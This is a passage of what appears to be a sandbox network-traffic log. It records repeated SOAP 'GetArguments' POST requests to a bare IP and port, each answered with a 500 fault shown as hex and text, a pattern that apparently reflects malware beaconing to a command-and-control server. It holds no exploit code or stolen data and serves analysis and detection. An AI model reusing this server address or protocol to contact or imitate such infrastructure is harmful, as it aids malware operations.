                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:53.791714907 CEST1197OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:53.861747026 CEST1197INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:53.933701992 CEST1198INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:53 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:54.947076082 CEST1207OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:55.031856060 CEST1207INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:55.106903076 CEST1208INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:55 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:56.118983030 CEST1223OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:56.187716007 CEST1225INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:56.261271954 CEST1239INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:56 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:57.275489092 CEST1266OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:57.345042944 CEST1266INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:57.427540064 CEST1267INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:57 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:58.431857109 CEST1268OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:58.501523018 CEST1268INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:58.572072029 CEST1269INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:58 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:59.715187073 CEST1269OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:59.785922050 CEST1269INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:59.884717941 CEST1271INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:59 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:00.900859118 CEST1276OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:00.971767902 CEST1276INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:01.043327093 CEST1278INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:00 GMT
